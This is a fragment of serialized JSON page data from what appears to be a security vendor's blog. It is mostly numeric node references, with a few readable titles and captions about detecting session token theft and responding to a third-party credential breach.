{"items":234140},[234141],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":234142},{"url":2911},{"json":234144,"links":234578},{"nodeType":165,"data":234145,"content":234146},{},[234147,234152,234158,234188,234194,234210,234216,234252,234258,234264,234270,234275,234281,234359,234365,234371,234392,234398,234404,234410,234416,234422,234428,234472,234478,234483,234499,234504,234510,234526,234532,234538,234544,234550,234556,234562],{"nodeType":312,"data":234148,"content":234151},{"target":234149},{"sys":234150},{"id":212043,"type":317,"linkType":318},[],{"nodeType":178,"data":234153,"content":234154},{},[234155],{"nodeType":173,"value":212049,"marks":234156,"data":234157},[],{},{"nodeType":250,"data":234159,"content":234160},{},[234161,234170,234179],{"nodeType":254,"data":234162,"content":234163},{},[234164],{"nodeType":178,"data":234165,"content":234166},{},[234167],{"nodeType":173,"value":212062,"marks":234168,"data":234169},[],{},{"nodeType":254,"data":234171,"content":234172},{},[234173],{"nodeType":178,"data":234174,"content":234175},{},[234176],{"nodeType":173,"value":212072,"marks":234177,"data":234178},[],{},{"nodeType":254,"data":234180,"content":234181},{},[234182],{"nodeType":178,"data":234183,"content":234184},{},[234185],{"nodeType":173,"value":212082,"marks":234186,"data":234187},[],{},{"nodeType":178,"data":234189,"content":234190},{},[234191],{"nodeType":173,"value":212089,"marks":234192,"data":234193},[],{},{"nodeType":178,"data":234195,"content":234196},{},[234197,234200,234207],{"nodeType":173,"value":212096,"marks":234198,"data":234199},[],{},{"nodeType":186,"data":234201,"content":234202},{"uri":212101},[234203],{"nodeType":173,"value":126168,"marks":234204,"data":234206},[234205],{"type":194},{},{"nodeType":173,"value":212108,"marks":234208,"data":234209},[],{},{"nodeType":169,"data":234211,"content":234212},{},[234213],{"nodeType":173,"value":212115,"marks":234214,"data":234215},[],{},{"nodeType":178,"data":234217,"content":234218},{},[234219,234222,234229,234232,234239,234242,234249],{"nodeType":173,"value":212122,"marks":234220,"data":234221},[],{},{"nodeType":186,"data":234223,"content":234224},{"uri":212127},[234225],{"nodeType":173,"value":212130,"marks":234226,"data":234228},[234227],{"type":194},{},{"nodeType":173,"value":212135,"marks":234230,"data":234231},[],{},{"nodeType":186,"data":234233,"content":234234},{"uri":212140},[234235],{"nodeType":173,"value":212143,"marks":234236,"data":234238},[234237],{"type":194},{},{"nodeType":173,"value":212148,"marks":234240,"data":234241},[],{},{"nodeType":186,"data":234243,"content":234244},{"uri":182804},[234245],{"nodeType":173,"value":212155,"marks":234246,"data":234248},[234247],{"type":194},{},{"nodeType":173,"value":212160,"marks":234250,"data":234251},[],{},{"nodeType":178,"data":234253,"content":234254},{},[234255],{"nodeType":173,"value":212167,"marks":234256,"data":234257},[],{},{"nodeType":178,"data":234259,"content":234260},{},[234261],{"nodeType":173,"value":212174,"marks":234262,"data":234263},[],{},{"nodeType":178,"data":234265,"content":234266},{},[234267],{"nodeType":173,"value":212181,"marks":234268,"data":234269},[],{},{"nodeType":312,"data":234271,"content":234274},{"target":234272},{"sys":234273},{"id":196342,"type":317,"linkType":318},[],{"nodeType":178,"data":234276,"content":234277},{},[234278],{"nodeType":173,"value":212193,"marks":234279,"data":234280},[],{},{"nodeType":250,"data":234282,"content":234283},{},[234284,234303,234322,234341],{"nodeType":254,"data":234285,"content":234286},{},[234287],{"nodeType":178,"data":234288,"content":234289},{},[234290,234293,234300],{"nodeType":173,"value":212206,"marks":234291,"data":234292},[],{},{"nodeType":186,"data":234294,"content":234295},{"uri":150408},[234296],{"nodeType":173,"value":212213,"marks":234297,"data":234299},[234298],{"type":194},{},{"nodeType":173,"value":37,"marks":234301,"data":234302},[],{},{"nodeType":254,"data":234304,"content":234305},{},[234306],{"nodeType":178,"data":234307,"content":234308},{},[234309,234312,234319],{"nodeType":173,"value":212227,"marks":234310,"data":234311},[],{},{"nodeType":186,"data":234313,"content":234314},{"uri":212232},[234315],{"nodeType":173,"value":212235,"marks":234316,"data":234318},[234317],{"type":194},{},{"nodeType":173,"value":37,"marks":234320,"data":234321},[],{},{"nodeType":254,"data":234323,"content":234324},{},[234325],{"nodeType":178,"data":234326,"content":234327},{},[234328,234331,234338],{"nodeType":173,"value":212249,"marks":234329,"data":234330},[],{},{"nodeType":186,"data":234332,"content":234333},{"uri":1297},[234334],{"nodeType":173,"value":212256,"marks":234335,"data":234337},[234336],{"type":194},{},{"nodeType":173,"value":37,"marks":234339,"data":234340},[],{},{"nodeType":254,"data":234342,"content":234343},{},[234344],{"nodeType":178,"data":234345,"content":234346},{},[234347,234350,234356],{"nodeType":173,"value":212270,"marks":234348,"data":234349},[],{},{"nodeType":186,"data":234351,"content":234352},{"uri":174431},[234353],{"nodeType":173,"value":212277,"marks":234354,"data":234355},[],{},{"nodeType":173,"value":37,"marks":234357,"data":234358},[],{},{"nodeType":169,"data":234360,"content":234361},{},[234362],{"nodeType":173,"value":212287,"marks":234363,"data":234364},[],{},{"nodeType":178,"data":234366,"content":234367},{},[234368],{"nodeType":173,"value":212294,"marks":234369,"data":234370},[],{},{"nodeType":250,"data":234372,"content":234373},{},[234374,234383],{"nodeType":254,"data":234375,"content":234376},{},[234377],{"nodeType":178,"data":234378,"content":234379},{},[234380],{"nodeType":173,"value":212307,"marks":234381,"data":234382},[],{},{"nodeType":254,"data":234384,"content":234385},{},[234386],{"nodeType":178,"data":234387,"content":234388},{},[234389],{"nodeType":173,"value":212317,"marks":234390,"data":234391},[],{},{"nodeType":178,"data":234393,"content":234394},{},[234395],{"nodeType":173,"value":212324,"marks":234396,"data":234397},[],{},{"nodeType":178,"data":234399,"content":234400},{},[234401],{"nodeType":173,"value":212331,"marks":234402,"data":234403},[],{},{"nodeType":169,"data":234405,"content":234406},{},[234407],{"nodeType":173,"value":212338,"marks":234408,"data":234409},[],{},{"nodeType":178,"data":234411,"content":234412},{},[234413],{"nodeType":173,"value":212345,"marks":234414,"data":234415},[],{},{"nodeType":178,"data":234417,"content":234418},{},[234419],{"nodeType":173,"value":212352,"marks":234420,"data":234421},[],{},{"nodeType":178,"data":234423,"content":234424},{},[234425],{"nodeType":173,"value":100610,"marks":234426,"data":234427},[],{},{"nodeType":250,"data":234429,"content":234430},{},[234431,234440,234449],{"nodeType":254,"data":234432,"content":234433},{},[234434],{"nodeType":178,"data":234435,"content":234436},{},[234437],{"nodeType":173,"value":212371,"marks":234438,"data":234439},[],{},{"nodeType":254,"data":234441,"content":234442},{},[234443],{"nodeType":178,"data":234444,"content":234445},{},[234446],{"nodeType":173,"value":212381,"marks":234447,"data":234448},[],{},{"nodeType":254,"data":234450,"content":234451},{},[234452],{"nodeType":178,"data":234453,"content":234454},{},[234455,234458,234462,234465,234469],{"nodeType":173,"value":212391,"marks":234456,"data":234457},[],{},{"nodeType":173,"value":208,"marks":234459,"data":234461},[234460],{"type":1646},{},{"nodeType":173,"value":212399,"marks":234463,"data":234464},[],{},{"nodeType":173,"value":114302,"marks":234466,"data":234468},[234467],{"type":1646},{},{"nodeType":173,"value":212407,"marks":234470,"data":234471},[],{},{"nodeType":178,"data":234473,"content":234474},{},[234475],{"nodeType":173,"value":212414,"marks":234476,"data":234477},[],{},{"nodeType":312,"data":234479,"content":234482},{"target":234480},{"sys":234481},{"id":114271,"type":317,"linkType":318},[],{"nodeType":178,"data":234484,"content":234485},{},[234486,234489,234496],{"nodeType":173,"value":212426,"marks":234487,"data":234488},[],{},{"nodeType":186,"data":234490,"content":234491},{"uri":212101},[234492],{"nodeType":173,"value":3262,"marks":234493,"data":234495},[234494],{"type":194},{},{"nodeType":173,"value":1477,"marks":234497,"data":234498},[],{},{"nodeType":312,"data":234500,"content":234503},{"target":234501},{"sys":234502},{"id":212443,"type":317,"linkType":318},[],{"nodeType":169,"data":234505,"content":234506},{},[234507],{"nodeType":173,"value":212449,"marks":234508,"data":234509},[],{},{"nodeType":178,"data":234511,"content":234512},{},[234513,234516,234523],{"nodeType":173,"value":212456,"marks":234514,"data":234515},[],{},{"nodeType":186,"data":234517,"content":234518},{"uri":212461},[234519],{"nodeType":173,"value":212464,"marks":234520,"data":234522},[234521],{"type":194},{},{"nodeType":173,"value":212469,"marks":234524,"data":234525},[],{},{"nodeType":178,"data":234527,"content":234528},{},[234529],{"nodeType":173,"value":212476,"marks":234530,"data":234531},[],{},{"nodeType":178,"data":234533,"content":234534},{},[234535],{"nodeType":173,"value":212483,"marks":234536,"data":234537},[],{},{"nodeType":178,"data":234539,"content":234540},{},[234541],{"nodeType":173,"value":212490,"marks":234542,"data":234543},[],{},{"nodeType":178,"data":234545,"content":234546},{},[234547],{"nodeType":173,"value":212497,"marks":234548,"data":234549},[],{},{"nodeType":178,"data":234551,"content":234552},{},[234553],{"nodeType":173,"value":212504,"marks":234554,"data":234555},[],{},{"nodeType":169,"data":234557,"content":234558},{},[234559],{"nodeType":173,"value":71801,"marks":234560,"data":234561},[],{},{"nodeType":178,"data":234563,"content":234564},{},[234565,234568,234575],{"nodeType":173,"value":114452,"marks":234566,"data":234567},[],{},{"nodeType":186,"data":234569,"content":234570},{"uri":473},[234571],{"nodeType":173,"value":88194,"marks":234572,"data":234574},[234573],{"type":194},{},{"nodeType":173,"value":202527,"marks":234576,"data":234577},[],{},{"entries":234579},{"hyperlink":234580,"inline":234581,"block":234582},[],[],[234583,234591,234594,234597],{"sys":234584,"__typename":127689,"title":234585,"youTubeUrl":234586,"imagePlaceholder":234587},{"id":212043},"Introducing session token theft detection with Push","https://www.youtube.com/watch?v=p4UCfeTs_po",{"url":234588,"width":234589,"height":234590},"https://images.ctfassets.net/y1cdw1ablpvd/3HHLFnvZ0hkovL7MJMGQN2/d82ab3a6757201d2cf9869ade89c9091/Screenshot_2024-08-15_at_07.15.04.png",3358,1888,{"sys":234592,"__typename":5345,"title":207222,"caption":207222,"layoutMode":118,"file":234593},{"id":196342},{"url":207224,"width":40,"height":207225},{"sys":234595,"__typename":5345,"title":232975,"caption":232976,"layoutMode":118,"file":234596},{"id":114271},{"url":232978,"width":23880,"height":100678},{"sys":234598,"__typename":5345,"title":234599,"caption":234599,"layoutMode":118,"file":234600},{"id":212443},"Sample syntax for querying session theft in a SIEM.",{"url":234601,"width":234602,"height":234603},"https://images.ctfassets.net/y1cdw1ablpvd/1eutG6NRlAHZB3w335MJzR/7708168c4ae2a28e4f2470e5f49e8138/image2.png",735,115,"content:blog:introducing-session-token-theft-detection-why-browser-is-best.json","blog/introducing-session-token-theft-detection-why-browser-is-best.json","blog/introducing-session-token-theft-detection-why-browser-is-best",{"_path":234608,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":234609,"ogImage":118,"summary":234611,"title":227883,"subtitle":118,"metaTitle":234622,"synopsis":227884,"hashTags":118,"publishedDate":227885,"slug":227886,"tagsCollection":234623,"relatedBlogPostsCollection":234629,"authorsCollection":236262,"content":236266,"_id":236619,"_type":5439,"_source":5440,"_file":236620,"_stem":236621,"_extension":5439},"/blog/investigating-and-responding-to-a-third-party-data-breach-using-push",{"id":227504,"publishedAt":234610},"2024-06-13T10:08:10.976Z",{"json":234612},{"data":234613,"content":234614,"nodeType":165},{},[234615],{"data":234616,"content":234617,"nodeType":178},{},[234618],{"data":234619,"marks":234620,"value":234621,"nodeType":173},{},[],"Use Push to find and secure workforce accounts using credentials stolen in a third-party data breach.","Responding to a third-party data breach using Push",{"items":234624},[234625,234627],{"sys":234626,"name":509},{"id":508},{"sys":234628,"name":26137},{"id":26136},{"items":234630},[234631,234995,235721],{"__typename":1528,"sys":234632,"content":234633,"title":202530,"synopsis":202531,"hashTags":118,"publishedDate":202532,"slug":202533,"tagsCollection":234985,"authorsCollection":234991},{"id":114387},{"json":234634},{"nodeType":165,"data":234635,"content":234636},{},[234637,234642,234659,234676,234691,234708,234729,234735,234752,234769,234775,234780,234786,234792,234798,234804,234810,234816,234822,234828,234834,234851,234857,234862,234882,234888,234903,234908,234925,234931,234937,234943,234949,234964,234970],{"nodeType":312,"data":234638,"content":234641},{"target":234639},{"sys":234640},{"id":202136,"type":317,"linkType":318},[],{"nodeType":178,"data":234643,"content":234644},{},[234645,234648,234656],{"nodeType":173,"value":202142,"marks":234646,"data":234647},[],{},{"nodeType":1698,"data":234649,"content":234652},{"target":234650},{"sys":234651},{"id":202149,"type":317,"linkType":318},[234653],{"nodeType":173,"value":202152,"marks":234654,"data":234655},[],{},{"nodeType":173,"value":202156,"marks":234657,"data":234658},[],{},{"nodeType":178,"data":234660,"content":234661},{},[234662,234665,234673],{"nodeType":173,"value":202163,"marks":234663,"data":234664},[],{},{"nodeType":1698,"data":234666,"content":234669},{"target":234667},{"sys":234668},{"id":202170,"type":317,"linkType":318},[234670],{"nodeType":173,"value":202173,"marks":234671,"data":234672},[],{},{"nodeType":173,"value":202177,"marks":234674,"data":234675},[],{},{"nodeType":178,"data":234677,"content":234678},{},[234679,234682,234688],{"nodeType":173,"value":202184,"marks":234680,"data":234681},[],{},{"nodeType":186,"data":234683,"content":234684},{"uri":183364},[234685],{"nodeType":173,"value":202191,"marks":234686,"data":234687},[],{},{"nodeType":173,"value":202195,"marks":234689,"data":234690},[],{},{"nodeType":178,"data":234692,"content":234693},{},[234694,234697,234705],{"nodeType":173,"value":202202,"marks":234695,"data":234696},[],{},{"nodeType":1698,"data":234698,"content":234701},{"target":234699},{"sys":234700},{"id":202149,"type":317,"linkType":318},[234702],{"nodeType":173,"value":202211,"marks":234703,"data":234704},[],{},{"nodeType":173,"value":202215,"marks":234706,"data":234707},[],{},{"nodeType":250,"data":234709,"content":234710},{},[234711,234720],{"nodeType":254,"data":234712,"content":234713},{},[234714],{"nodeType":178,"data":234715,"content":234716},{},[234717],{"nodeType":173,"value":202228,"marks":234718,"data":234719},[],{},{"nodeType":254,"data":234721,"content":234722},{},[234723],{"nodeType":178,"data":234724,"content":234725},{},[234726],{"nodeType":173,"value":202238,"marks":234727,"data":234728},[],{},{"nodeType":178,"data":234730,"content":234731},{},[234732],{"nodeType":173,"value":202245,"marks":234733,"data":234734},[],{},{"nodeType":178,"data":234736,"content":234737},{},[234738,234741,234749],{"nodeType":173,"value":202252,"marks":234739,"data":234740},[],{},{"nodeType":1698,"data":234742,"content":234745},{"target":234743},{"sys":234744},{"id":2148,"type":317,"linkType":318},[234746],{"nodeType":173,"value":202261,"marks":234747,"data":234748},[],{},{"nodeType":173,"value":202265,"marks":234750,"data":234751},[],{},{"nodeType":178,"data":234753,"content":234754},{},[234755,234758,234766],{"nodeType":173,"value":202272,"marks":234756,"data":234757},[],{},{"nodeType":1698,"data":234759,"content":234762},{"target":234760},{"sys":234761},{"id":189461,"type":317,"linkType":318},[234763],{"nodeType":173,"value":202281,"marks":234764,"data":234765},[],{},{"nodeType":173,"value":202285,"marks":234767,"data":234768},[],{},{"nodeType":178,"data":234770,"content":234771},{},[234772],{"nodeType":173,"value":202292,"marks":234773,"data":234774},[],{},{"nodeType":312,"data":234776,"content":234779},{"target":234777},{"sys":234778},{"id":202299,"type":317,"linkType":318},[],{"nodeType":169,"data":234781,"content":234782},{},[234783],{"nodeType":173,"value":202305,"marks":234784,"data":234785},[],{},{"nodeType":178,"data":234787,"content":234788},{},[234789],{"nodeType":173,"value":202312,"marks":234790,"data":234791},[],{},{"nodeType":178,"data":234793,"content":234794},{},[234795],{"nodeType":173,"value":202319,"marks":234796,"data":234797},[],{},{"nodeType":178,"data":234799,"content":234800},{},[234801],{"nodeType":173,"value":202326,"marks":234802,"data":234803},[],{},{"nodeType":178,"data":234805,"content":234806},{},[234807],{"nodeType":173,"value":202333,"marks":234808,"data":234809},[],{},{"nodeType":178,"data":234811,"content":234812},{},[234813],{"nodeType":173,"value":202340,"marks":234814,"data":234815},[],{},{"nodeType":178,"data":234817,"content":234818},{},[234819],{"nodeType":173,"value":202347,"marks":234820,"data":234821},[],{},{"nodeType":169,"data":234823,"content":234824},{},[234825],{"nodeType":173,"value":189115,"marks":234826,"data":234827},[],{},{"nodeType":178,"data":234829,"content":234830},{},[234831],{"nodeType":173,"value":202360,"marks":234832,"data":234833},[],{},{"nodeType":178,"data":234835,"content":234836},{},[234837,234840,234848],{"nodeType":173,"value":202367,"marks":234838,"data":234839},[],{},{"nodeType":1698,"data":234841,"content":234844},{"target":234842},{"sys":234843},{"id":183439,"type":317,"linkType":318},[234845],{"nodeType":173,"value":155418,"marks":234846,"data":234847},[],{},{"nodeType":173,"value":202379,"marks":234849,"data":234850},[],{},{"nodeType":178,"data":234852,"content":234853},{},[234854],{"nodeType":173,"value":202386,"marks":234855,"data":234856},[],{},{"nodeType":312,"data":234858,"content":234861},{"target":234859},{"sys":234860},{"id":189099,"type":317,"linkType":318},[],{"nodeType":178,"data":234863,"content":234864},{},[234865,234868,234872,234875,234879],{"nodeType":173,"value":180786,"marks":234866,"data":234867},[],{},{"nodeType":173,"value":2748,"marks":234869,"data":234871},[234870],{"type":370},{},{"nodeType":173,"value":202405,"marks":234873,"data":234874},[],{},{"nodeType":173,"value":2740,"marks":234876,"data":234878},[234877],{"type":370},{},{"nodeType":173,"value":202413,"marks":234880,"data":234881},[],{},{"nodeType":178,"data":234883,"content":234884},{},[234885],{"nodeType":173,"value":202420,"marks":234886,"data":234887},[],{},{"nodeType":178,"data":234889,"content":234890},{},[234891,234894,234900],{"nodeType":173,"value":196274,"marks":234892,"data":234893},[],{},{"nodeType":186,"data":234895,"content":234896},{"uri":183466},[234897],{"nodeType":173,"value":155030,"marks":234898,"data":234899},[],{},{"nodeType":173,"value":196284,"marks":234901,"data":234902},[],{},{"nodeType":312,"data":234904,"content":234907},{"target":234905},{"sys":234906},{"id":202442,"type":317,"linkType":318},[],{"nodeType":178,"data":234909,"content":234910},{},[234911,234914,234922],{"nodeType":173,"value":202448,"marks":234912,"data":234913},[],{},{"nodeType":1698,"data":234915,"content":234918},{"target":234916},{"sys":234917},{"id":2405,"type":317,"linkType":318},[234919],{"nodeType":173,"value":125683,"marks":234920,"data":234921},[],{},{"nodeType":173,"value":202460,"marks":234923,"data":234924},[],{},{"nodeType":178,"data":234926,"content":234927},{},[234928],{"nodeType":173,"value":202467,"marks":234929,"data":234930},[],{},{"nodeType":178,"data":234932,"content":234933},{},[234934],{"nodeType":173,"value":202474,"marks":234935,"data":234936},[],{},{"nodeType":169,"data":234938,"content":234939},{},[234940],{"nodeType":173,"value":117844,"marks":234941,"data":234942},[],{},{"nodeType":178,"data":234944,"content":234945},{},[234946],{"nodeType":173,"value":202487,"marks":234947,"data":234948},[],{},{"nodeType":178,"data":234950,"content":234951},{},[234952,234955,234961],{"nodeType":173,"value":202494,"marks":234953,"data":234954},[],{},{"nodeType":186,"data":234956,"content":234957},{"uri":202499},[234958],{"nodeType":173,"value":202502,"marks":234959,"data":234960},[],{},{"nodeType":173,"value":1477,"marks":234962,"data":234963},[],{},{"nodeType":169,"data":234965,"content":234966},{},[234967],{"nodeType":173,"value":71801,"marks":234968,"data":234969},[],{},{"nodeType":178,"data":234971,"content":234972},{},[234973,234976,234982],{"nodeType":173,"value":114452,"marks":234974,"data":234975},[],{},{"nodeType":186,"data":234977,"content":234978},{"uri":473},[234979],{"nodeType":173,"value":88194,"marks":234980,"data":234981},[],{},{"nodeType":173,"value":202527,"marks":234983,"data":234984},[],{},{"items":234986},[234987,234989],{"sys":234988,"name":18399},{"id":18398},{"sys":234990,"name":509},{"id":508},{"items":234992},[234993],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":234994},{"url":2911},{"__typename":1528,"sys":234996,"content":234997,"title":140020,"synopsis":230548,"hashTags":118,"publishedDate":230549,"slug":230550,"tagsCollection":235711,"authorsCollection":235717},{"id":202149},{"json":234998},{"nodeType":165,"data":234999,"content":235000},{},[235001,235007,235013,235019,235025,235031,235037,235043,235049,235055,235060,235066,235072,235078,235124,235130,235136,235152,235158,235164,235170,235196,235209,235215,235221,235227,235233,235239,235245,235261,235277,235375,235381,235397,235403,235409,235415,235420,235426,235432,235438,235464,235470,235476,235506,235512,235518,235600,235615,235621,235627,235633,235639,235685,235691,235694,235700,235705],{"nodeType":178,"data":235002,"content":235003},{},[235004],{"nodeType":173,"value":229742,"marks":235005,"data":235006},[],{},{"nodeType":178,"data":235008,"content":235009},{},[235010],{"nodeType":173,"value":229749,"marks":235011,"data":235012},[],{},{"nodeType":178,"data":235014,"content":235015},{},[235016],{"nodeType":173,"value":229756,"marks":235017,"data":235018},[],{},{"nodeType":169,"data":235020,"content":235021},{},[235022],{"nodeType":173,"value":229763,"marks":235023,"data":235024},[],{},{"nodeType":178,"data":235026,"content":235027},{},[235028],{"nodeType":173,"value":229770,"marks":235029,"data":235030},[],{},{"nodeType":178,"data":235032,"content":235033},{},[235034],{"nodeType":173,"value":229777,"marks":235035,"data":235036},[],{},{"nodeType":178,"data":235038,"content":235039},{},[235040],{"nodeType":173,"value":229784,"marks":235041,"data":235042},[],{},{"nodeType":178,"data":235044,"content":235045},{},[235046],{"nodeType":173,"value":229791,"marks":235047,"data":235048},[],{},{"nodeType":178,"data":235050,"content":235051},{},[235052],{"nodeType":173,"value":229798,"marks":235053,"data":235054},[],{},{"nodeType":312,"data":235056,"content":235059},{"target":235057},{"sys":235058},{"id":229805,"type":317,"linkType":318},[],{"nodeType":235,"data":235061,"content":235062},{},[235063],{"nodeType":173,"value":229811,"marks":235064,"data":235065},[],{},{"nodeType":178,"data":235067,"content":235068},{},[235069],{"nodeType":173,"value":229818,"marks":235070,"data":235071},[],{},{"nodeType":178,"data":235073,"content":235074},{},[235075],{"nodeType":173,"value":229825,"marks":235076,"data":235077},[],{},{"nodeType":178,"data":235079,"content":235080},{},[235081,235084,235091,235094,235101,235104,235111,235114,235121],{"nodeType":173,"value":229832,"marks":235082,"data":235083},[],{},{"nodeType":186,"data":235085,"content":235086},{"uri":196192},[235087],{"nodeType":173,"value":196195,"marks":235088,"data":235090},[235089],{"type":194},{},{"nodeType":173,"value":2936,"marks":235092,"data":235093},[],{},{"nodeType":186,"data":235095,"content":235096},{"uri":196203},[235097],{"nodeType":173,"value":196206,"marks":235098,"data":235100},[235099],{"type":194},{},{"nodeType":173,"value":229853,"marks":235102,"data":235103},[],{},{"nodeType":186,"data":235105,"content":235106},{"uri":181618},[235107],{"nodeType":173,"value":181621,"marks":235108,"data":235110},[235109],{"type":194},{},{"nodeType":173,"value":229864,"marks":235112,"data":235113},[],{},{"nodeType":186,"data":235115,"content":235116},{"uri":196223},[235117],{"nodeType":173,"value":196226,"marks":235118,"data":235120},[235119],{"type":194},{},{"nodeType":173,"value":1477,"marks":235122,"data":235123},[],{},{"nodeType":178,"data":235125,"content":235126},{},[235127],{"nodeType":173,"value":229881,"marks":235128,"data":235129},[],{},{"nodeType":178,"data":235131,"content":235132},{},[235133],{"nodeType":173,"value":229888,"marks":235134,"data":235135},[],{},{"nodeType":178,"data":235137,"content":235138},{},[235139,235142,235149],{"nodeType":173,"value":229895,"marks":235140,"data":235141},[],{},{"nodeType":186,"data":235143,"content":235144},{"uri":229900},[235145],{"nodeType":173,"value":229903,"marks":235146,"data":235148},[235147],{"type":194},{},{"nodeType":173,"value":481,"marks":235150,"data":235151},[],{},{"nodeType":235,"data":235153,"content":235154},{},[235155],{"nodeType":173,"value":229914,"marks":235156,"data":235157},[],{},{"nodeType":178,"data":235159,"content":235160},{},[235161],{"nodeType":173,"value":229921,"marks":235162,"data":235163},[],{},{"nodeType":178,"data":235165,"content":235166},{},[235167],{"nodeType":173,"value":229928,"marks":235168,"data":235169},[],{},{"nodeType":178,"data":235171,"content":235172},{},[235173,235176,235183,235186,235193],{"nodeType":173,"value":229935,"marks":235174,"data":235175},[],{},{"nodeType":186,"data":235177,"content":235178},{"uri":180509},[235179],{"nodeType":173,"value":229942,"marks":235180,"data":235182},[235181],{"type":194},{},{"nodeType":173,"value":229947,"marks":235184,"data":235185},[],{},{"nodeType":186,"data":235187,"content":235188},{"uri":229952},[235189],{"nodeType":173,"value":229955,"marks":235190,"data":235192},[235191],{"type":194},{},{"nodeType":173,"value":229960,"marks":235194,"data":235195},[],{},{"nodeType":178,"data":235197,"content":235198},{},[235199,235202,235206],{"nodeType":173,"value":229967,"marks":235200,"data":235201},[],{},{"nodeType":173,"value":229971,"marks":235203,"data":235205},[235204],{"type":370},{},{"nodeType":173,"value":229976,"marks":235207,"data":235208},[],{},{"nodeType":178,"data":235210,"content":235211},{},[235212],{"nodeType":173,"value":229983,"marks":235213,"data":235214},[],{},{"nodeType":178,"data":235216,"content":235217},{},[235218],{"nodeType":173,"value":229990,"marks":235219,"data":235220},[],{},{"nodeType":169,"data":235222,"content":235223},{},[235224],{"nodeType":173,"value":229997,"marks":235225,"data":235226},[],{},{"nodeType":178,"data":235228,"content":235229},{},[235230],{"nodeType":173,"value":230004,"marks":235231,"data":235232},[],{},{"nodeType":178,"data":235234,"content":235235},{},[235236],{"nodeType":173,"value":230011,"marks":235237,"data":235238},[],{},{"nodeType":178,"data":235240,"content":235241},{},[235242],{"nodeType":173,"value":230018,"marks":235243,"data":235244},[],{},{"nodeType":178,"data":235246,"content":235247},{},[235248,235251,235258],{"nodeType":173,"value":230025,"marks":235249,"data":235250},[],{},{"nodeType":186,"data":235252,"content":235253},{"uri":230030},[235254],{"nodeType":173,"value":230033,"marks":235255,"data":235257},[235256],{"type":194},{},{"nodeType":173,"value":230038,"marks":235259,"data":235260},[],{},{"nodeType":178,"data":235262,"content":235263},{},[235264,235267,235274],{"nodeType":173,"value":230045,"marks":235265,"data":235266},[],{},{"nodeType":186,"data":235268,"content":235269},{"uri":88239},[235270],{"nodeType":173,"value":88245,"marks":235271,"data":235273},[235272],{"type":194},{},{"nodeType":173,"value":230056,"marks":235275,"data":235276},[],{},{"nodeType":250,"data":235278,"content":235279},{},[235280,235299,235318,235337,235356],{"nodeType":254,"data":235281,"content":235282},{},[235283],{"nodeType":178,"data":235284,"content":235285},{},[235286,235289,235296],{"nodeType":173,"value":37,"marks":235287,"data":235288},[],{},{"nodeType":186,"data":235290,"content":235291},{"uri":59347},[235292],{"nodeType":173,"value":230075,"marks":235293,"data":235295},[235294],{"type":194},{},{"nodeType":173,"value":37,"marks":235297,"data":235298},[],{},{"nodeType":254,"data":235300,"content":235301},{},[235302],{"nodeType":178,"data":235303,"content":235304},{},[235305,235308,235315],{"nodeType":173,"value":37,"marks":235306,"data":235307},[],{},{"nodeType":186,"data":235309,"content":235310},{"uri":230093},[235311],{"nodeType":173,"value":230096,"marks":235312,"data":235314},[235313],{"type":194},{},{"nodeType":173,"value":37,"marks":235316,"data":235317},[],{},{"nodeType":254,"data":235319,"content":235320},{},[235321],{"nodeType":178,"data":235322,"content":235323},{},[235324,235327,235334],{"nodeType":173,"value":37,"marks":235325,"data":235326},[],{},{"nodeType":186,"data":235328,"content":235329},{"uri":832},[235330],{"nodeType":173,"value":230116,"marks":235331,"data":235333},[235332],{"type":194},{},{"nodeType":173,"value":37,"marks":235335,"data":235336},[],{},{"nodeType":254,"data":235338,"content":235339},{},[235340],{"nodeType":178,"data":235341,"content":235342},{},[235343,235346,235353],{"nodeType":173,"value":37,"marks":235344,"data":235345},[],{},{"nodeType":186,"data":235347,"content":235348},{"uri":197688},[235349],{"nodeType":173,"value":230136,"marks":235350,"data":235352},[235351],{"type":194},{},{"nodeType":173,"value":37,"marks":235354,"data":235355},[],{},{"nodeType":254,"data":235357,"content":235358},{},[235359],{"nodeType":178,"data":235360,"content":235361},{},[235362,235365,235372],{"nodeType":173,"value":37,"marks":235363,"data":235364},[],{},{"nodeType":186,"data":235366,"content":235367},{"uri":144083},[235368],{"nodeType":173,"value":230156,"marks":235369,"data":235371},[235370],{"type":194},{},{"nodeType":173,"value":37,"marks":235373,"data":235374},[],{},{"nodeType":178,"data":235376,"content":235377},{},[235378],{"nodeType":173,"value":230167,"marks":235379,"data":235380},[],{},{"nodeType":178,"data":235382,"content":235383},{},[235384,235387,235394],{"nodeType":173,"value":230174,"marks":235385,"data":235386},[],{},{"nodeType":186,"data":235388,"content":235389},{"uri":63250},[235390],{"nodeType":173,"value":63256,"marks":235391,"data":235393},[235392],{"type":194},{},{"nodeType":173,"value":230185,"marks":235395,"data":235396},[],{},{"nodeType":169,"data":235398,"content":235399},{},[235400],{"nodeType":173,"value":230192,"marks":235401,"data":235402},[],{},{"nodeType":178,"data":235404,"content":235405},{},[235406],{"nodeType":173,"value":230199,"marks":235407,"data":235408},[],{},{"nodeType":178,"data":235410,"content":235411},{},[235412],{"nodeType":173,"value":230206,"marks":235413,"data":235414},[],{},{"nodeType":312,"data":235416,"content":235419},{"target":235417},{"sys":235418},{"id":230213,"type":317,"linkType":318},[],{"nodeType":178,"data":235421,"content":235422},{},[235423],{"nodeType":173,"value":230219,"marks":235424,"data":235425},[],{},{"nodeType":169,"data":235427,"content":235428},{},[235429],{"nodeType":173,"value":230226,"marks":235430,"data":235431},[],{},{"nodeType":178,"data":235433,"content":235434},{},[235435],{"nodeType":173,"value":230233,"marks":235436,"data":235437},[],{},{"nodeType":178,"data":235439,"content":235440},{},[235441,235444,235454,235457,235461],{"nodeType":173,"value":230240,"marks":235442,"data":235443},[],{},{"nodeType":186,"data":235445,"content":235446},{"uri":183364},[235447,235451],{"nodeType":173,"value":230247,"marks":235448,"data":235450},[235449],{"type":194},{},{"nodeType":173,"value":1260,"marks":235452,"data":235453},[],{},{"nodeType":173,"value":230255,"marks":235455,"data":235456},[],{},{"nodeType":173,"value":230259,"marks":235458,"data":235460},[235459],{"type":370},{},{"nodeType":173,"value":230264,"marks":235462,"data":235463},[],{},{"nodeType":169,"data":235465,"content":235466},{},[235467],{"nodeType":173,"value":143524,"marks":235468,"data":235469},[],{},{"nodeType":178,"data":235471,"content":235472},{},[235473],{"nodeType":173,"value":230277,"marks":235474,"data":235475},[],{},{"nodeType":250,"data":235477,"content":235478},{},[235479,235488,235497],{"nodeType":254,"data":235480,